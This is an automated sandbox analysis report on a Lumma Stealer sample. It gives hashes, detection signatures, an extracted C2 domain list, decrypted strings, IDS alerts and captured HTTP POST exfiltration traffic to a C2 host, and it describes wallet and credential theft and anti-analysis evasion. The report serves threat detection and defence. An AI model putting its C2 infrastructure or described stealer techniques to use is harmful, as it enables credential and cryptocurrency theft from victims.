Windows Analysis Report
tPSrcPbmRe.exe

Overview

General Information

Sample name: tPSrcPbmRe.exe (renamed because original name is a hash value)
Original sample name: 259cea876b4ff788ed27fab1f9a978ce.exe
Analysis ID: 1579658
MD5: 259cea876b4ff788ed27fab1f9a978ce
SHA1: 97928786646a7187c2a02c4acb9fb5b863dc1721
SHA256: 7d6d42d07947b28756c4c28821f090b28d8f5f1262d355cd0a6d8ec02b49e81b
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tPSrcPbmRe.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\tPSrcPbmRe.exe" MD5: 259CEA876B4FF788ED27FAB1F9A978CE)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sustainskelet.lat", "necklacebudi.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "sweepyribs.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T07:09:20.477893+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49707 | 23.55.153.106 | 443 | TCP
2024-12-23T07:09:22.985523+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:24.985880+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:27.420862+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:29.758273+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:32.243897+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:34.965088+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49740 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:37.537904+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:41.398205+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49758 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:23.739006+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:25.764957+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:23.739006+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:25.764957+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:18.373559+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63906 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.656111+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59967 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:17.944613+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 52798 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.228583+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59103 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:17.648936+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 58185 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.086991+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63137 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.796359+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 62827 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.514270+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 52077 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:17.454637+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 50836 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:37.551995+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:21.404431+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49707 | 23.55.153.106 | 443 | TCP


                AV Detection

Source: tPSrcPbmRe.exe | Avira: detected
Source: tPSrcPbmRe.exe.6480.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "necklacebudi.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "sweepyribs.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}
Source: tPSrcPbmRe.exe | ReversingLabs: Detection: 68%
Source: tPSrcPbmRe.exe | Virustotal: Detection: 69%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: tPSrcPbmRe.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: tPSrcPbmRe.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.6:63137 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:58185 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.6:62827 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.6:59103 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:63906 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.6:52077 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:50836 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.6:59967 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:52798 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49707 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49747 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49758 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49740 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QA0GZX9INMITFNAV1T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12859 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=IC694IXKWB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15057 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=O4QKLE92WLB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19921 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=U852JZ4VHFZ4M1T2B | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1226 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6E5DHM678T6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 572684 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic | DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic | DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic | DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic | DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic | DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic | DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
